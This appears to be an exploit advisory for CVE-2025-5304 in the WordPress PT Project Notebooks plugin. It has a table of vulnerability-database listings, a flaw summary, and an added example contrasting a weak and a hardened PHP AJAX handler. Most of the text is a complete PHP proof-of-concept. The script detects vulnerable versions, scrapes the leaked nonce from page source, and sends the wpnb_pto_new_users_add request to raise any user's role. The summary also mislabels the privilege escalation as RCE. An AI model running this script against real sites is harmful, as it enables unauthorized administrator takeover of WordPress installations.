| Title | Published | Views | Family |
|---|---|---|---|
| Exploit for Missing Authorization in Ptoffice Pt_Project_Notebooks | 27 Sep 2025 02:19 | – | githubexploit |
| CVE-2025-5304 | 28 Jun 2025 05:51 | – | circl |
| WordPress plugin PT Project Notebooks security vulnerability | 28 Jun 2025 00:00 | – | cnnvd |
| CVE-2025-5304 | 28 Jun 2025 05:29 | – | cve |
| CVE-2025-5304 PT Project Notebooks 1.0.0 - 1.1.3 - Missing Authorization to Unauthenticated Privilege Escalation via wpnb_pto_new_users_add Function | 28 Jun 2025 05:29 | – | cvelist |
| EUVD-2025-19577 | 3 Oct 2025 20:07 | – | euvd |
| CVE-2025-5304 | 28 Jun 2025 06:15 | – | nvd |
| CVE-2025-5304 | 28 Jun 2025 06:15 | – | osv |
| WordPress PT Project Notebooks plugin 1.0.0-1.1.3 - Missing Authorization to Unauthenticated Privilege Escalation vulnerability | 27 Jun 2025 23:09 | – | patchstack |
| PT-2025-27288 · WordPress · Pt Project Notebooks | 28 Jun 2025 00:00 | – | ptsecurity |
=============================================================================================================================================
| # Title : WordPress Project Notebooks Plugin 1.1.4 – RCE vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://wordpress.org/plugins/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/209970/ & CVE-2025-5304
[+] Summary
An RCE vulnerability exists in the Project Notebooks WordPress plugin prior to version 1.1.4,
allowing unauthenticated or low-privileged attackers to escalate any WordPress user to higher roles,
including administrator, through improper validation of AJAX actions and nonce exposure.
The vulnerability is actively exploitable whenever the plugin leaks a valid nonce value and the AJAX
handler wpnb_pto_new_users_add fails to fully verify the caller's capability requirements.
[+] Vulnerability Details
The plugin exposes its internal configuration objects (including nonce and ajax_url) directly in the HTML source.
An attacker can extract this nonce and send a crafted request to wp-admin/admin-ajax.php?action=wpnb_pto_new_users_add
The handler then accepts user IDs (ids) and privilege levels (user_type) without validating whether the requester has sufficient permissions.
This enables:
  - Unauthorized user privilege escalation
  - Unauthorized role assignment
  - Full WordPress takeover if executed against an administrator ID
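The root cause described above is a handler that treats a nonce as proof of authorization. In WordPress a nonce only ties a request to a page that rendered it (CSRF protection); because the plugin prints the nonce into public HTML, it proves nothing about who is calling. The following is an added example, not the plugin's own code and not the advisory author's: a hypothetical handler for a "promote users" AJAX action, first in the weak shape the advisory describes and then hardened. The function names, the hook name `wp_ajax_example_users_add`, the nonce action `example_nonce` and the use of role names in `user_type` are assumptions; the WordPress API calls (`check_ajax_referer`, `current_user_can`, `wp_send_json_error`, `WP_User::set_role`) are the real ones.

```php
<?php
// Added example (hypothetical plugin code, not Project Notebooks itself).

// Weak pattern: the only gate is the nonce. It is readable from the page
// source, and no capability check or role allowlist is applied.
function example_weak_users_add() {
    check_ajax_referer( 'example_nonce', 'nonce' );      // proves the caller saw the page, nothing more
    $ids  = array_map( 'intval', explode( ',', $_POST['ids'] ?? '' ) );
    $role = sanitize_text_field( $_POST['user_type'] ?? '' );
    foreach ( $ids as $id ) {
        $user = get_user_by( 'id', $id );
        if ( $user ) {
            $user->set_role( $role );                     // any role, any user, any caller
        }
    }
    wp_send_json_success();
}

// Hardened pattern: authentication, CSRF and authorization are three separate checks,
// and both the target role and the target users are constrained.
function example_hardened_users_add() {
    // 1. Authentication. Register the action with wp_ajax_ only (never wp_ajax_nopriv_),
    //    so an anonymous request never reaches this code; the check below is a second line.
    if ( ! is_user_logged_in() ) {
        wp_send_json_error( 'authentication required', 401 );
    }

    // 2. CSRF protection: the nonce is still required, but it is not authorization.
    check_ajax_referer( 'example_nonce', 'nonce' );

    // 3. Authorization: the caller must hold the capability that this action exercises.
    if ( ! current_user_can( 'promote_users' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // 4. Input validation: the target role comes from an explicit allowlist.
    //    Administrator is deliberately not reachable through this endpoint.
    $allowed_roles = array( 'subscriber', 'contributor', 'author' );   // assumption for the example
    $role = sanitize_key( $_POST['user_type'] ?? '' );
    if ( ! in_array( $role, $allowed_roles, true ) ) {
        wp_send_json_error( 'invalid role', 400 );
    }

    // 5. Per-target checks: integer IDs only, the caller must be allowed to edit each
    //    user, and administrator accounts are never touched from here.
    $ids     = array_filter( array_map( 'absint', explode( ',', $_POST['ids'] ?? '' ) ) );
    $updated = array();
    foreach ( $ids as $id ) {
        $target = get_user_by( 'id', $id );
        if ( ! $target
            || ! current_user_can( 'edit_user', $id )
            || in_array( 'administrator', $target->roles, true ) ) {
            continue;
        }
        $target->set_role( $role );
        $updated[] = $id;
    }
    wp_send_json_success( array( 'updated' => $updated ) );
}

// Authenticated-only registration: no wp_ajax_nopriv_ counterpart.
add_action( 'wp_ajax_example_users_add', 'example_hardened_users_add' );
```

For a site owner who cannot update immediately, the same three-layer model tells you what to look for in access logs: POST requests to admin-ajax.php carrying the plugin's action from sessions that should not hold `promote_users`, and any role change on an administrator account that did not originate from wp-admin/users.php.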
[+] PoC
Run using: php poc.php -u http://target.com -id 28 -c "wordpress_logged_in=COOKIE_VALUE"
```php
<?php
// PoC (CVE-2025-5304)
// By Indoushka
function nxploited_headers($cookie = null) {
    $agents = [
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Nxploited",
        "Mozilla/5.0 (X11; Linux x86_64) Nxploited",
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Nxploited",
        "Nxploited/1.0 (compatible;)",
        "Nxploited/2.0 (Special Edition)",
        "Mozilla/5.0 Nxploited"
    ];
    $headers = [
        "User-Agent: " . $agents[array_rand($agents)] . " | Nxploited",
        "X-Nxploited: Nxploited"
    ];
    if ($cookie) {
        $headers[] = "Cookie: $cookie";
    }
    return $headers;
}
function nxploited_normalize_url($url) {
    $url = trim($url);
    if (!preg_match('#^https?://#i', $url)) {
        $url = "http://" . $url;
    }
    return rtrim($url, "/");
}
// Reads the plugin version from the public readme.txt ("Stable tag: x.y.z").
function nxploited_fetch_version($base_url, $cookie = null, $timeout = 12) {
    $readme_url = $base_url . "/wp-content/plugins/project-notebooks/readme.txt";
    $ch = curl_init($readme_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, nxploited_headers($cookie));
    curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
    $text = curl_exec($ch);
    curl_close($ch);
    if (preg_match('/Stable\s*tag:\s*([0-9][0-9.\-a-zA-Z]*)/i', $text, $m)) {
        $version = trim($m[1]);
        echo "[+] Nxploited: Detected version from readme.txt → $version\n";
        return [$version, true];
    }
    echo "[-] Nxploited: Could not parse version from $readme_url\n";
    return [null, false];
}
function nxploited_is_vulnerable($version) {
    $vulnerable_versions = ["1.1.3","1.1.2","1.1.1","1.1.0","1.0.9","1.0.8","1.0.7","1.0.6","1.0.5","1.0.4","1.0.3","1.0.2","1.0.1","1.0.0"];
    return in_array($version, $vulnerable_versions);
}
// Pulls "nonce" and "ajax_url" out of the configuration object the plugin prints into the page.
function nxploited_extract_nonce_ajax($base_url, $cookie = null, $timeout = 12) {
    $ch = curl_init($base_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, nxploited_headers($cookie));
    curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
    $html = curl_exec($ch);
    curl_close($ch);
    preg_match('/"nonce"\s*:\s*"([^"]+)"/', $html, $m_nonce);
    preg_match('/"ajax_url"\s*:\s*"([^"]+)"/', $html, $m_ajax);
    $nonce = $m_nonce[1] ?? null;
    $ajax_url = isset($m_ajax[1]) ? str_replace("\\/", "/", $m_ajax[1]) : $base_url . "/wp-admin/admin-ajax.php";
    if ($nonce) echo "[+] Nxploited: Nonce found: $nonce\n";
    else echo "[-] Nxploited: Nonce not found in page source.\n";
    echo "[+] Nxploited: AJAX URL: $ajax_url\n";
    return [$nonce, $ajax_url];
}
function nxploited_exploit($ajax_url, $uid, $nonce, $cookie = null, $timeout = 12) {
    $data = [
        "action" => "wpnb_pto_new_users_add",
        "nonce" => $nonce,
        "ids" => (string)$uid,
        "user_type" => "2",
        "Nxploited" => "Nxploited"
    ];
    echo "[*] Nxploited: Exploiting… wait 3 seconds.\n";
    sleep(3);
    $ch = curl_init($ajax_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, nxploited_headers($cookie));
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
    curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
    $body = curl_exec($ch);
    $status = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    echo "[+] Nxploited: HTTP $status\n";
    echo substr($body, 0, 1500) . "\n";
    return [$status, $body];
}
// ------------------------
// Main Execution
// ------------------------
// PHP getopt has no multi-character short options, so "-id 28" is parsed as
// "-i" plus "-d 28"; the value is therefore read from 'd' as well as from "--id".
$options = getopt("u:id:c:", ["url:", "id:", "cookie:", "skip-version"]);
$base_url_arg = $options['u'] ?? $options['url'] ?? null;
$uid = $options['id'] ?? $options['d'] ?? null;
$cookie = $options['c'] ?? $options['cookie'] ?? null;
if ($base_url_arg === null || $uid === null) {
    die("Usage: php poc.php -u http://target.com -id 28 [-c \"wordpress_logged_in=COOKIE_VALUE\"] [--skip-version]\n");
}
$base_url = nxploited_normalize_url($base_url_arg);
if (!isset($options['skip-version'])) {
    list($detected_version, $ok) = nxploited_fetch_version($base_url, $cookie);
    if ($detected_version) {
        $vuln = nxploited_is_vulnerable($detected_version);
        $state = $vuln ? "vulnerable" : "not confirmed vulnerable";
        echo "[+] Nxploited: Version $detected_version → $state\n";
    } else {
        echo "[!] Nxploited: Proceeding without confirmed version (use --skip-version to suppress).\n";
    }
}
list($nonce, $ajax_url) = nxploited_extract_nonce_ajax($base_url, $cookie);
if (!$nonce) die("[!] Nxploited: Abort: nonce not found.\n");
if (isset($detected_version)) echo "[i] Nxploited: Target version during exploitation → $detected_version\n";
list($status, $body) = nxploited_exploit($ajax_url, $uid, $nonce, $cookie);
if (!$status) exit(2);
if (strpos($body, "Busted!") !== false) {
    die("[!] Nxploited: Server replied 'Busted!' (nonce/session mismatch). Use correct cookie.\n");
}
?>
```
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================